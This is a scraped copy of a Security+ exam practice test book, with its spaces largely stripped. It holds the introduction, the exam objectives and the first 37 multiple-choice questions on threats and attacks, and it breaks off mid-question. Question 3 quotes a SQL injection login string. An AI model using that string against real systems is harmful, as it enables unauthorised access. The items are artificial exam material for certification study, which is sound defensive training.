comptia security+ practice tests - dl1.newoutlook.it
Post on 19-Mar-2023
1 Views
Preview:
TRANSCRIPT
TableofContentsCoverTitlePageCopyrightDedicationAcknowledgmentsAbouttheAuthorAbouttheTechnicalEditorIntroduction
TheSecurity+ExamUsingThisBooktoPracticeExamSY0-601ExamObjectivesSY0-601CertificationExamObjectiveMap
Chapter1:Threats,Attacks,andVulnerabilitiesChapter2:ArchitectureandDesignChapter3:ImplementationChapter4:OperationsandIncidentResponseChapter5:Governance,Risk,andComplianceAppendix:AnswersandExplanations
Chapter1: Threats,Attacks,andVulnerabilitiesChapter2:ArchitectureandDesignChapter3:ImplementationChapter4:OperationsandIncidentResponseChapter5:Governance,Risk,andCompliance
IndexEndUserLicenseAgreement
Telegram Channel @nettrain
Copyright©2021byJohnWiley&Sons,Inc.,Indianapolis,Indiana
PublishedsimultaneouslyinCanada
ISBN:978-1-119-73546-5
ISBN:978-1-119-73545-8(ebk.)
ISBN:978-1-119-73544-1(ebk.)
Nopartofthispublicationmaybereproduced,storedinaretrievalsystemortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanningorotherwise,exceptaspermittedunderSections107or108ofthe1976UnitedStatesCopyrightAct,withouteitherthepriorwrittenpermissionofthePublisher,orauthorizationthroughpaymentoftheappropriateper-copyfeetotheCopyrightClearanceCenter,222RosewoodDrive,Danvers,MA01923,(978)750-8400,fax(978)646-8600.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-6011,fax(201)748-6008,oronlineatwww.wiley.com/go/permissions.
LimitofLiability/DisclaimerofWarranty:Thepublisherandtheauthormakenorepresentationsorwarrantieswithrespecttotheaccuracyorcompletenessofthecontentsofthisworkandspecificallydisclaimallwarranties,includingwithoutlimitationwarrantiesoffitnessforaparticularpurpose.Nowarrantymaybecreatedorextendedbysalesorpromotionalmaterials.Theadviceandstrategiescontainedhereinmaynotbesuitableforeverysituation.Thisworkissoldwiththeunderstandingthatthepublisherisnotengagedinrenderinglegal,accounting,orotherprofessionalservices.Ifprofessionalassistanceisrequired,theservicesofacompetentprofessionalpersonshouldbesought.Neitherthepublishernortheauthorshallbeliablefordamagesarisingherefrom.ThefactthatanorganizationorWebsiteisreferredtointhisworkasacitationand/orapotentialsourceoffurtherinformationdoesnotmeanthattheauthororthepublisherendorsestheinformationtheorganizationorWebsitemayprovideorrecommendationsitmaymake.Further,readersshouldbeawarethatInternetWebsiteslistedinthisworkmayhavechangedordisappearedbetweenwhenthisworkwaswrittenandwhenitisread.
Forgeneralinformationonourotherproductsandservicesortoobtaintechnicalsupport,pleasecontactourCustomerCareDepartmentwithintheU.S.at(877)762-2974,outsidetheU.S.at(317)572-3993orfax(317)572-4002.
Wileypublishesinavarietyofprintandelectronicformatsandbyprint-on-demand.Somematerialincludedwithstandardprintversionsofthisbookmaynotbeincludedine-booksorinprint-on-demand.IfthisbookreferstomediasuchasaCDorDVDthatisnotincludedintheversionyoupurchased,youmaydownloadthismaterialatbooksupport.wiley.com.FormoreinformationaboutWileyproducts,visitwww.wiley.com.
LibraryofCongressControlNumber:2020950198
TRADEMARKS:Wiley,theWileylogo,andtheSybexlogoaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.and/oritsaffiliates,intheUnitedStatesandothercountries,andmaynotbeusedwithoutwrittenpermission.CompTIAandSecurity+areregisteredtrademarksofCompTIAProperties,LLC.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.
Telegram Channel @nettrain
ThisbookisdedicatedtoMikeChapple,whohelpedmegetmystartinthewritingfield.Aftermostofadecadewritingtogether,thisismyfirstentirelysoloproject.Mike,thankyouforhelpingmegetmystartalmostadecadeago,forencouragingmealongtheway,andforcontinuingtochallengemetodomoreeachtimewetakeonanotherbook.
—David
Telegram Channel @nettrain
AcknowledgmentsBookslikethisinvolveworkfrommanypeoplewhoputcountlesshoursoftimeandeffortintoproducingthemfromconcepttofinalprintedandelectroniccopies.ThehardworkanddedicationoftheteamatWileyalwaysshows.IespeciallywanttoacknowledgeandthanksenioracquisitionseditorKenyonBrown,whocontinuestobeawonderfulpersontoworkwithonbookafterbook.
Ialsogreatlyappreciatedtheeditingandproductionteamforthebook,includingTomDinse,theprojecteditor,whobroughtyearsofexperienceandgreattalenttotheproject;ChrisCrayton,thetechnicaleditor,whoprovidedinsightfuladviceandgavewonderfulfeedbackthroughoutthebook;andSaravananDakshinamurthy,theproductioneditor,whoguidedmethroughlayouts,formatting,andfinalcleanuptoproduceagreatbook.Iwouldalsoliketothankthemanybehind-the-scenescontributors,includingthegraphics,production,andtechnicalteamswhomakethebookandcompanionmaterialsintoafinishedproduct.
Myagent,CaroleJelenofWatersideProductions,continuestoprovideuswithwonderfulopportunities,advice,andassistancethroughoutourwritingcareers.
Finally,Iwanttothankmyfriendsandfamily,whohavesupportedmethroughthelateevenings,busyweekends,andlonghoursthatabooklikethisrequirestowrite,edit,andgettopress.
Telegram Channel @nettrain
AbouttheAuthorDavidSeidlisvicepresidentforinformationtechnologyandCIOatMiamiUniversity,whereheisresponsibleforITforMiamiUniversity.DuringhisITcareer,hehasservedinavarietyoftechnicalandinformationsecurityroles,includingservingastheseniordirectorforCampusTechnologyServicesattheUniversityofNotreDame,whereheco-ledNotreDame'smovetothecloudandoversawcloudoperations,ERP,databases,identitymanagement,andabroadrangeofothertechnologiesandservice.PriortohisseniorleadershiprolesatNotreDame,heservedasNotreDame'sdirectorofinformationsecurityandledNotreDame'sinformationsecurityprogram.HetaughtinformationsecurityandnetworkingundergraduatecoursesasaninstructorforNotreDame'sMendozaCollegeofBusinessandhaswrittenbooksonsecuritycertificationandcyberwarfare,includingcoauthoringCISSP(ISC)2OfficialPracticeTests(Sybex,2018)aswellasthecurrentandpreviouseditionsoftheCompTIACySA+StudyGuide:ExamCS0-002(Wiley,2020,Chapple/Seidl)andCompTIACySA+PracticeTests:ExamCS0-002(Wiley,2020,Chapple/Seidl).
Davidholdsabachelor'sdegreeincommunicationtechnologyandamaster'sdegreeininformationsecurityfromEasternMichiganUniversity,aswellasCISSP,CySA+,Pentest+,GPEN,andGCIHcertifications.
Telegram Channel @nettrain
AbouttheTechnicalEditorChrisCrayton,MSCE,CISSP,CySA+,A+,N+,S+,isatechnicalconsultant,trainer,author,andindustry-leadingtechnicaleditor.Hehasworkedasacomputertechnologyandnetworkinginstructor,informationsecuritydirector,networkadministrator,networkengineer,andPCspecialist.Chrishasservedastechnicaleditorandcontentcontributoronnumeroustechnicaltitlesforseveraloftheleadingpublishingcompanies.Hehasalsobeenrecognizedwithmanyprofessionalandteachingawards.
Telegram Channel @nettrain
IntroductionCompTIASecurity+PracticeTests:ExamSY0-601,SecondEditionistheperfectcompanionvolumetotheCompTIASecurity+StudyGuide:ExamSY0-601,EighthEdition(Wiley,2020,Chapple/Seidl).Ifyou'relookingtotestyourknowledgebeforeyoutaketheSecurity+exam,thisbookwillhelpyoubyprovidingacombinationof1,100questionsthatcovertheSecurity+domainsandeasy-to-understandexplanationsofbothrightandwronganswers.
Ifyou'rejuststartingtopreparefortheSecurity+exam,wehighlyrecommendthatyouusetheCompTIASecurity+StudyGuide,EighthEditiontohelpyoulearnabouteachofthedomainscoveredbytheSecurity+exam.Onceyou'rereadytotestyourknowledge,usethisbooktohelpfindplaceswhereyoumayneedtostudymoreortopracticefortheexamitself.
SincethisisacompaniontotheSecurity+StudyGuide,thisbookisdesignedtobesimilartotakingtheSecurity+exam.Thebookitselfisbrokenupintosevenchapters:fivedomain-centricchapterswithquestionsabouteachdomain,andtwochaptersthatcontain100-questionpracticeteststosimulatetakingtheSecurity+examitself.
Ifyoucananswer90percentormoreofthequestionsforadomaincorrectly,youcanfeelsafemovingontothenextchapter.Ifyou'reunabletoanswerthatmanycorrectly,rereadthechapterandtrythequestionsagain.Yourscoreshouldimprove.
Don'tjuststudythequestionsandanswers!Thequestionsontheactualexamwillbedifferentfromthepracticequestionsincludedinthisbook.Theexamisdesignedtotestyourknowledgeofaconceptorobjective,sousethisbooktolearntheobjectivesbehindthequestions.
TheSecurity+ExamTheSecurity+examisdesignedtobeavendor-neutralcertificationfor
Telegram Channel @nettrain
cybersecurityprofessionalsandthoseseekingtoenterthefield.CompTIArecommendsthiscertificationforthosecurrentlyworking,oraspiringtowork,inroles,including:
Systemsadministrator
Securityadministrator
Securityspecialist
Securityengineer
Networkadministrator
JuniorITauditor/penetrationtester
Securityconsultant
Theexamcoversfivemajordomains:
1. Threats,Attacks,andVulnerabilities
2. ArchitectureandDesign
3. Implementation
4. OperationsandIncidentResponse
5. Governance,Risk,andCompliance
Thesefiveareasincludearangeoftopics,fromfirewalldesigntoincidentresponseandforensics,whilefocusingheavilyonscenario-basedlearning.That'swhyCompTIArecommendsthatthoseattemptingtheexamhaveatleasttwoyearsofhands-onworkexperience,althoughmanyindividualspasstheexambeforemovingintotheirfirstcybersecurityrole.
TheSecurity+examisconductedinaformatthatCompTIAcalls“performance-basedassessment.”Thismeansthattheexamcombinesstandardmultiple-choicequestionswithother,interactivequestionformats.Yourexammayincludemultipletypesofquestions,suchasmultiple-choice,fill-in-the-blank,multiple-response,drag-and-drop,andimage-basedproblems.
CompTIArecommendsthattesttakershavetwoyearsofinformationsecurity–relatedexperiencebeforetakingthisexam.Theexamcosts$349intheUnitedStates,withroughlyequivalentpricesinotherlocationsaroundtheglobe.MoredetailsabouttheSecurity+examandhowtotakeitcanbefoundhere:www.comptia.org/certifications/security
Telegram Channel @nettrain
ThisbookincludesadiscountcodefortheSecurity+exam—makesureyouuseit!
You'llhave90minutestotaketheexamandwillbeaskedtoanswerupto90questionsduringthattimeperiod.Yourexamwillbescoredonascalerangingfrom100to900,withapassingscoreof750.
YoushouldalsoknowthatCompTIAisnotoriousforincludingvaguequestionsonallofitsexams.Youmightseeaquestionforwhichtwoofthepossiblefouranswersarecorrect—butyoucanchooseonlyone.Useyourknowledge,logic,andintuitiontochoosethebestanswerandthenmoveon.Sometimes,thequestionsarewordedinwaysthatwouldmakeEnglishmajorscringe—atypohere,anincorrectverbthere.Don'tletthisfrustrateyou;answerthequestionandmoveontothenextone.
CompTIAfrequentlydoeswhatiscalleditemseeding,whichisthepracticeofincludingunscoredquestionsonexams.Itdoessotogatherpsychometricdata,whichisthenusedwhendevelopingnewversionsoftheexam.Beforeyoutaketheexam,youwillbetoldthatyourexammayincludetheseunscoredquestions.So,ifyoucomeacrossaquestionthatdoesnotappeartomaptoanyoftheexamobjectives—orforthatmatter,doesnotappeartobelongintheexam—itislikelyaseededquestion.Youneverknowwhetherornotaquestionisseeded,however,soalwaysmakeyourbestefforttoanswereveryquestion.
TakingtheExamOnceyouarefullypreparedtotaketheexam,youcanvisittheCompTIAwebsitetopurchaseyourexamvoucher:www.comptiastore.com/Articles.asp?ID=265&category=vouchers
CompTIApartnerswithPearsonVUE'stestingcenters,soyournextstepwillbetolocateatestingcenternearyou.IntheUnitedStates,youcandothisbasedon
Telegram Channel @nettrain
youraddressoryourZIPcode,whereasnon-U.S.testtakersmayfinditeasiertoentertheircityandcountry.YoucansearchforatestcenternearyouatthePearsonVuewebsite,whereyouwillneedtonavigateto“Findatestcenter.”www.pearsonvue.com/comptia
Nowthatyouknowwhereyou'dliketotaketheexam,simplysetupaPearsonVUEtestingaccountandscheduleanexam:home.pearsonvue.com/comptia/onvue
Onthedayofthetest,taketwoformsofidentification,andmakesuretoshowupwithplentyoftimebeforetheexamstarts.Rememberthatyouwillnotbeabletotakeyournotes,electronicdevices(includingsmartphonesandwatches),orothermaterialsinwithyou,andthatotherrequirementsmayexistforthetest.Makesureyoureviewthoserequirementsbeforethedayofyourtestsoyou'refullypreparedforboththetestitselfaswellasthetestingprocessandfacilityrules.
AftertheSecurity+ExamOnceyouhavetakentheexam,youwillbenotifiedofyourscoreimmediately,soyou'llknowifyoupassedthetestrightaway.Youshouldkeeptrackofyourscorereportwithyourexamregistrationrecordsandtheemailaddressyouusedtoregisterfortheexam.
MaintainingYourCertificationCompTIAcertificationsmustberenewedonaperiodicbasis.Torenewyourcertification,youcanpassthemostcurrentversionoftheexam,earnaqualifyinghigher-levelCompTIAorindustrycertification,orcompletesufficientcontinuingeducationactivitiestoearnenoughcontinuingeducationunits(CEUs)torenewit.
CompTIAprovidesinformationonrenewalsviatheirwebsiteat:www.comptia.org/continuing-education
Whenyousignuptorenewyourcertification,youwillbeaskedtoagreetotheCEprogram'sCodeofEthics,topayarenewalfee,andtosubmitthematerialsrequiredforyourchosenrenewalmethod.
AfulllistoftheindustrycertificationsyoucanusetoacquireCEUstowardrenewingtheSecurity+canbefoundat:www.comptia.org/continuing-education/choose/renew-with-a-single-
Telegram Channel @nettrain
UsingThisBooktoPracticeThisbookiscomposedofsevenchapterswithover1,000practicetestquestions.Eachofthefirstfivechapterscoversadomain,withavarietyofquestionsthatcanhelpyoutestyourknowledgeofreal-world,scenario,andbestpractices–basedsecurityknowledge.Thefinaltwochaptersarecompletepracticeexamsthatcanserveastimedpracticeteststohelpdeterminewhetheryou'rereadyfortheSecurity+exam.
Werecommendtakingthefirstpracticeexamtohelpidentifywhereyoumayneedtospendmorestudytimeandthenusingthedomain-specificchapterstotestyourdomainknowledgewhereitisweak.Onceyou'reready,takethesecondpracticeexamtomakesureyou'vecoveredallthematerialandarereadytoattempttheSecurity+exam.
Asyouworkthroughquestionsinthisbook,youwillencountertoolsandtechnologythatyoumaynotbefamiliarwith.Ifyoufindthatyouarefacingaconsistentgaporthatadomainisparticularlychallenging,werecommendspendingsometimewithbooksandmaterialsthattacklethatdomainindepth.Thisapproachcanhelpyoufillingapsandhelpyoubemorepreparedfortheexam.
Toaccessourinteractivetestbankandonlinelearningenvironment,simplyvisitwww.wiley.com/go/sybextestprep,registertoreceiveyouruniquePIN,andinstantlygainoneyearofFREEaccessafteractivationtotheinteractivetestbankwith2practiceexamsandhundredsofdomain-by-domainquestions.Over1,000questionstotal!
ExamSY0-601ExamObjectivesCompTIAgoestogreatlengthstoensurethatitscertificationprogramsaccuratelyreflecttheITindustry'sbestpractices.Theydothisbyestablishingcommitteesforeachofitsexamprograms.EachcommitteeconsistsofasmallgroupofITprofessionals,trainingproviders,andpublisherswhoareresponsible
Telegram Channel @nettrain
forestablishingtheexam'sbaselinecompetencylevelandwhodeterminetheappropriatetarget-audiencelevel.
Oncethesefactorsaredetermined,CompTIAsharesthisinformationwithagroupofhand-selectedsubjectmatterexperts(SMEs).Thesefolksarethetruebrainpowerbehindthecertificationprogram.TheSMEsreviewthecommittee'sfindings,refinethem,andshapethemintotheobjectivesthatfollowthissection.CompTIAcallsthisprocessajob-taskanalysis(JTA).
Finally,CompTIAconductsasurveytoensurethattheobjectivesandweightingstrulyreflectjobrequirements.OnlythencantheSMEsgotoworkwritingthehundredsofquestionsneededfortheexam.Evenso,theyhavetogobacktothedrawingboardforfurtherrefinementsinmanycasesbeforetheexamisreadytogoliveinitsfinalstate.Restassuredthatthecontentyou'reabouttolearnwillserveyoulongafteryoutaketheexam.
CompTIAalsopublishesrelativeweightingsforeachoftheexam'sobjectives.ThefollowingtableliststhefiveSecurity+objectivedomainsandtheextenttowhichtheyarerepresentedontheexam.
Domain %ofExam1.0Threats,Attacks,andVulnerabilities 24%2.0ArchitectureandDesign 21%3.0Implementation 25%4.0OperationsandIncidentResponse 16%5.0Governance,Risk,andCompliance 14%
SY0-601CertificationExamObjectiveMapObjective Chapter1.0Threats,AttacksandVulnerabilities1.1Compareandcontrastdifferenttypesofsocialengineeringtechniques
Chapter1
1.2Givenascenario,analyzepotentialindicatorstodeterminethetypeofattack
Chapter1
1.3Givenascenario,analyzepotentialindicatorsassociatedwithapplicationattacks
Chapter1
1.4Givenascenario,analyzepotentialindicatorsassociatedwith Chapter
Telegram Channel @nettrain
networkattacks 11.5Explaindifferentthreatactors,vectors,andintelligencesources Chapter
11.6Explainthesecurityconcernsassociatedwithvarioustypesofvulnerabilities
Chapter1
1.7Summarizethetechniquesusedinsecurityassessments Chapter1
1.8Explainthetechniquesusedinpenetrationtesting Chapter1
2.0ArchitectureandDesign2.1Explaintheimportanceofsecurityconceptsinanenterpriseenvironment
Chapter2
2.2Summarizevirtualizationandcloudcomputingconcepts Chapter2
2.3Summarizesecureapplicationdevelopment,deployment,andautomationconcepts
Chapter2
2.4Summarizeauthenticationandauthorizationdesignconcepts Chapter2
2.5Givenascenario,implementcybersecurityresilience Chapter2
2.6Explainthesecurityimplicationsofembeddedandspecializedsystems
Chapter2
2.7Explaintheimportanceofphysicalsecuritycontrols Chapter2
2.8Summarizethebasicsofcryptographicconcepts Chapter2
3.0Implementation3.1Givenascenario,implementsecureprotocols Chapter
33.2Givenascenario,implementhostorapplicationsecuritysolutions Chapter
33.3Givenascenario,implementsecurenetworkdesigns Chapter
33.4Givenascenario,installandconfigurewirelesssecuritysettings Chapter
Telegram Channel @nettrain
3
3.5Givenascenario,implementsecuremobilesolutions Chapter3
3.6Givenascenario,applycybersecuritysolutionstothecloud Chapter3
3.7Givenascenario,implementidentityandaccountmanagementcontrols
Chapter3
3.8Givenascenario,implementauthenticationandauthorizationsolutions
Chapter3
3.9Givenascenario,implementpublickeyinfrastructure Chapter3
4.0OperationsandIncidentResponse4.1Givenascenariousetheappropriatetooltoassessorganizationalsecurity
Chapter4
4.2Summarizetheimportanceofpolicies,processes,andproceduresforincidentresponse
Chapter4
4.3Givenanincident,utilizeappropriatedatasourcestosupportaninvestigation
Chapter4
4.4Givenanincident,applymitigationtechniquesorcontrolstosecureanenvironment
Chapter4
4.5Explainthekeyaspectsofdigitalforensics Chapter4
5.0Governance,Risk,andCompliance5.1Compareandcontrastvarioustypesofcontrols Chapter
55.2Explaintheimportanceofapplicableregulations,standards,orframeworksthatimpactorganizationalsecurityposture
Chapter5
5.3Explaintheimportanceofpoliciestoorganizationalsecurity Chapter5
5.4Summarizeriskmanagementprocessesandconcepts Chapter5
5.5Explainprivacyandsensitivedataconceptsinrelationtosecurity Chapter5
Telegram Channel @nettrain
ExamobjectivesaresubjecttochangeatanytimewithoutpriornoticeandatCompTIA'sdiscretion.PleasevisitCompTIA'swebsite(www.comptia.org)forthemostcurrentlistingofexamobjectives.
Telegram Channel @nettrain
Chapter1Threats,Attacks,andVulnerabilities
THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:
1.1 Compareandcontrastdifferenttypesofsocialengineeringtechniques
1.2 Givenascenario,analyzepotentialindicatorstodeterminethetypeofattack
1.3 Givenascenario,analyzepotentialindicatorsassociatedwithapplicationattacks
1.4 Givenascenario,analyzepotentialindicatorsassociatedwithnetworkattacks
1.5 Explaindifferentthreatactors,vectors,andintelligencesources
1.6 Explainthesecurityconcernsassociatedwithvarioustypesofvulnerabilities
1.7 Summarizethetechniquesusedinsecurityassessments
1.8 Explainthetechniquesusedinpenetrationtesting
1. Ahmedisasalesmanagerwithamajorinsurancecompany.Hehasreceivedanemailthatisencouraginghimtoclickonalinkandfilloutasurvey.Heissuspiciousoftheemail,butitdoesmentionamajorinsuranceassociation,andthatmakeshimthinkitmightbelegitimate.Whichofthefollowingbestdescribesthisattack?
A. Phishing
B. Socialengineering
C. Spearphishing
D. Trojanhorse
Telegram Channel @nettrain
2. Youareasecurityadministratorforamedium-sizedbank.Youhavediscoveredapieceofsoftwareonyourbank'sdatabaseserverthatisnotsupposedtobethere.Itappearsthatthesoftwarewillbegindeletingdatabasefilesifaspecificemployeeisterminated.Whatbestdescribesthis?
A. Worm
B. Logicbomb
C. Trojanhorse
D. Rootkit
3. YouareresponsibleforincidentresponseatAcmeBank.TheAcmeBankwebsitehasbeenattacked.Theattackerusedtheloginscreen,butratherthanenterlogincredentials,theyenteredsomeoddtext:'or'1'='1.Whatisthebestdescriptionforthisattack?
A. Cross-sitescripting
B. Cross-siterequestforgery
C. SQLinjection
D. ARPpoisoning
4. Usersarecomplainingthattheycannotconnecttothewirelessnetwork.YoudiscoverthattheWAPsarebeingsubjectedtoawirelessattackdesignedtoblocktheirWi-Fisignals.Whichofthefollowingisthebestlabelforthisattack?
A. IVattack
B. Jamming
C. WPSattack
D. Botnet
5. Frankisdeeplyconcernedaboutattackstohiscompany'se-commerceserver.Heisparticularlyworriedaboutcross-sitescriptingandSQLinjection.Whichofthefollowingwouldbestdefendagainstthesetwospecificattacks?
A. Encryptedwebtraffic
B. Inputvalidation
Telegram Channel @nettrain
C. Afirewall
D. AnIDS
6. YouareresponsiblefornetworksecurityatAcmeCompany.Usershavebeenreportingthatpersonaldataisbeingstolenwhenusingthewirelessnetwork.Theyallinsisttheyonlyconnecttothecorporatewirelessaccesspoint(AP).However,logsfortheAPshowthattheseusershavenotconnectedtoit.Whichofthefollowingcouldbestexplainthissituation?
A. Sessionhijacking
B. Clickjacking
C. Rogueaccesspoint
D. Bluejacking
7. WhattypeofattackdependsontheattackerenteringJavaScriptintoatextareathatisintendedforuserstoentertextthatwillbeviewedbyotherusers?
A. SQLinjection
B. Clickjacking
C. Cross-sitescripting
D. Bluejacking
8. Rickwantstomakeofflinebrute-forceattacksagainsthispasswordfileverydifficultforattackers.Whichofthefollowingisnotacommontechniquetomakepasswordshardertocrack?
A. Useofasalt
B. Useofapepper
C. Useofapurpose-builtpasswordhashingalgorithm
D. Encryptingpasswordplaintextusingsymmetricencryption
9. WhattermisusedtodescribespamoverInternetmessagingservices?
A. SPIM
B. SMSPAM
C. IMSPAM
D. TwoFaceTiming
Telegram Channel @nettrain
10. Susanisanalyzingthesourcecodeforanapplicationanddiscoversapointerde-referenceandreturnsNULL.ThiscausestheprogramtoattempttoreadfromtheNULLpointerandresultsinasegmentationfault.Whatimpactcouldthishavefortheapplication?
A. Adatabreach
B. Adenial-of-servicecondition
C. Permissionscreep
D. Privilegeescalation
11. Teresaisthesecuritymanagerforamid-sizedinsurancecompany.Shereceivesacallfromlawenforcement,tellingherthatsomecomputersonhernetworkparticipatedinamassivedenial-of-service(DoS)attack.Teresaiscertainthatnoneoftheemployeesathercompanywouldbeinvolvedinacybercrime.Whatwouldbestexplainthisscenario?
A. Itisaresultofsocialengineering.
B. Themachinesallhavebackdoors.
C. Themachinesarebots.
D. Themachinesareinfectedwithcrypto-viruses.
12. Unusualoutboundnetworktraffic,geographicalirregularities,andincreasesindatabasereadvolumesareallexamplesofwhatkeyelementofthreatintelligence?
A. Predictiveanalysis
B. OSINT
C. Indicatorsofcompromise
D. Threatmaps
13. ChrisneedsvisibilityintoconnectionattemptsthroughafirewallbecausehebelievesthataTCPhandshakeisnotproperlyoccurring.Whatsecurityinformationandeventmanagement(SIEM)capabilityisbestsuitedtotroubleshootingthisissue?
A. Reviewingreports
B. Packetcapture
Telegram Channel @nettrain
C. Sentimentanalysis
D. Logcollectionandanalysis
14. Chriswantstodetectapotentialinsiderthreatusinghissecurityinformationandeventmanagement(SIEM)system.Whatcapabilitybestmatcheshisneeds?
A. Sentimentanalysis
B. Logaggregation
C. Securitymonitoring
D. Userbehavioranalysis
15. Chrishashundredsofsystemsspreadacrossmultiplelocationsandwantstobetterhandletheamountofdatathattheycreate.Whattwotechnologiescanhelpwiththis?
A. Logaggregationandlogcollectors
B. Packetcaptureandlogaggregation
C. Securitymonitoringandlogcollectors
D. Sentimentanalysisanduserbehavioranalysis
16. Whattypeofsecurityteamestablishestherulesofengagementforacybersecurityexercise?
A. Blueteam
B. Whiteteam
C. Purpleteam
D. Redteam
17. Cynthiaisconcernedaboutattacksagainstanapplicationprogramminginterface(API)thathercompanyprovidesforitscustomers.WhatshouldsherecommendtoensurethattheAPIisonlyusedbycustomerswhohavepaidfortheservice?
A. Requireauthentication.
B. Installandconfigureafirewall.
C. FilterbyIPaddress.
D. InstallanduseanIPS.
Telegram Channel @nettrain
18. Whattypeofattackisbasedonsendingmoredatatoatargetvariablethanthedatacanactuallyhold?
A. Bluesnarfing
B. Bufferoverflow
C. Bluejacking
D. Cross-sitescripting
19. AnemailarrivestellingGurvinderthatthereisalimitedtimetoacttogetasoftwarepackageforfreeandthatthefirst50downloadswillnothavetobepaidfor.Whatsocialengineeringprincipleisbeingusedagainsthim?
A. Scarcity
B. Intimidation
C. Authority
D. Consensus
20. Youhavebeenaskedtotestyourcompanynetworkforsecurityissues.Thespecifictestyouareconductinginvolvesprimarilyusingautomatedandsemiautomatedtoolstolookforknownvulnerabilitieswiththevarioussystemsonyournetwork.Whichofthefollowingbestdescribesthistypeoftest?
A. Vulnerabilityscan
B. Penetrationtest
C. Securityaudit
D. Securitytest
21. Susanwantstoreducethelikelihoodofsuccessfulcredentialharvestingattacksviaherorganization'scommercialwebsites.Whichofthefollowingisnotacommonpreventionmethodaimedatstoppingcredentialharvesting?
A. Useofmultifactorauthentication
B. Userawarenesstraining
C. Useofcomplexusernames
D. Limitingorpreventinguseofthird-partywebscriptsandplugins
Telegram Channel @nettrain
22. Gregwantstogainadmissiontoanetworkwhichisprotectedbyanetworkaccesscontrol(NAC)systemthatrecognizedthehardwareaddressofsystems.Howcanhebypassthisprotection?
A. SpoofalegitimateIPaddress.
B. Conductadenial-of-serviceattackagainsttheNACsystem.
C. UseMACcloningtoclonealegitimateMACaddress.
D. Noneoftheabove
23. Coleenisthewebsecurityadministratorforanonlineauctionwebsite.Asmallnumberofusersarecomplainingthatwhentheyvisitthewebsiteitdoesnotappeartobethecorrectsite.Coleenchecksandshecanvisitthesitewithoutanyproblem,evenfromcomputersoutsidethenetwork.Shealsochecksthewebserverlogandthereisnorecordofthoseuserseverconnecting.Whichofthefollowingmightbestexplainthis?
A. Typosquatting
B. SQLinjection
C. Cross-sitescripting
D. Cross-siterequestforgery
24. TheorganizationthatMikeworksinfindsthatoneoftheirdomainsisdirectingtraffictoacompetitor'swebsite.WhenMikechecks,thedomaininformationhasbeenchanged,includingthecontactandotheradministrativedetailsforthedomain.Ifthedomainhadnotexpired,whathasmostlikelyoccurred?
A. DNShijacking
B. Anon-pathattack
C. Domainhijacking
D. Azero-dayattack
25. Mahmoudisresponsibleformanagingsecurityatalargeuniversity.Hehasjustperformedathreatanalysisforthenetwork,andbasedonpastincidentsandstudiesofsimilarnetworks,hehasdeterminedthatthemostprevalentthreattohisnetworkislow-skilledattackerswhowishtobreachthesystem,simplytoprovetheycanorforsomelow-levelcrime,suchaschangingagrade.Whichtermbestdescribesthistypeofattacker?
Telegram Channel @nettrain
A. Hacktivist
B. Amateur
C. Insider
D. Scriptkiddie
26. Howisphishingdifferentfromgeneralspam?
A. Itissentonlytospecifictargetedindividuals.
B. Itisintendedtoacquirecredentialsorotherdata.
C. ItissentviaSMS.
D. Itincludesmalwareinthemessage.
27. Whichofthefollowingbestdescribesacollectionofcomputersthathavebeencompromisedandarebeingcontrolledfromonecentralpoint?
A. Zombienet
B. Botnet
C. Nullnet
D. Attacknet
28. Selahincludesaquestioninherprocurementrequest-for-proposalprocessthataskshowlongthevendorhasbeeninbusinessandhowmanyexistingclientsthevendorhas.Whatcommonissueisthispracticeintendedtohelpprevent?
A. Supplychainsecurityissues
B. Lackofvendorsupport
C. Outsourcedcodedevelopmentissues
D. Systemintegrationproblems
29. Johnisconductingapenetrationtestofaclient'snetwork.Heiscurrentlygatheringinformationfromsourcessuchasarchive.org,netcraft.com,socialmedia,andinformationwebsites.Whatbestdescribesthisstage?
A. Activereconnaissance
B. Passivereconnaissance
C. Initialexploitation
Telegram Channel @nettrain
D. Pivot
30. AlicewantstopreventSSRFattacks.Whichofthefollowingwillnotbehelpfulforpreventingthem?
A. RemovingallSQLcodefromsubmittedHTTPqueries
B. Blockinghostnameslike127.0.01andlocalhost
C. BlockingsensitiveURLslike/admin
D. Applyingwhitelist-basedinputfilters
31. Whattypeofattackisbasedonenteringfakeentriesintoatargetnetwork'sdomainnameserver?
A. DNSpoisoning
B. ARPpoisoning
C. XSSpoisoning
D. CSRFpoisoning
32. Frankhasbeenaskedtoconductapenetrationtestofasmallbookkeepingfirm.Forthetest,hehasonlybeengiventhecompanyname,thedomainnamefortheirwebsite,andtheIPaddressoftheirgatewayrouter.Whatbestdescribesthistypeoftest?
A. Aknownenvironmenttest
B. Externaltest
C. Anunknownenvironmenttest
D. Threattest
33. Youworkforasecuritycompanythatperformspenetrationtestingforclients.Youareconductingatestofane-commercecompany.Youdiscoverthataftercompromisingthewebserver,youcanusethewebservertolaunchasecondattackintothecompany'sinternalnetwork.Whatbestdescribesthis?
A. Internalattack
B. Knownenvironmenttesting
C. Unknownenvironmenttesting
D. Apivot
Telegram Channel @nettrain
34. Whileinvestigatingamalwareoutbreakonyourcompanynetwork,youdiscoversomethingveryodd.ThereisafilethathasthesamenameasaWindowssystemDLL,anditevenhasthesameAPIinterface,butithandlesinputverydifferently,inamannertohelpcompromisethesystem,anditappearsthatapplicationshavebeenattachingtothisfile,ratherthantherealsystemDLL.Whatbestdescribesthis?
A. Shimming
B. Trojanhorse
C. Backdoor
D. Refactoring
35. WhichofthefollowingcapabilitiesisnotakeypartofaSOAR(securityorchestration,automation,andresponse)tool?
A. Threatandvulnerabilitymanagement
B. Securityincidentresponse
C. Automatedmalwareanalysis
D. Securityoperationsautomation
36. Johndiscoversthatemailfromhiscompany'semailserversisbeingblockedbecauseofspamthatwassentfromacompromisedaccount.WhattypeoflookupcanheusetodeterminewhatvendorslikeMcAfeeandBarracudahaveclassifiedhisdomainas?
A. Annslookup
B. Atcpdump
C. Adomainreputationlookup
D. ASMTPwhois
37. Frankisanetworkadministratorforasmallcollege.Hediscoversthatseveralmachinesonhisnetworkareinfectedwithmalware.Thatmalwareissendingafloodofpacketstoatargetexternaltothenetwork.Whatbestdescribesthisattack?
A. SYNflood
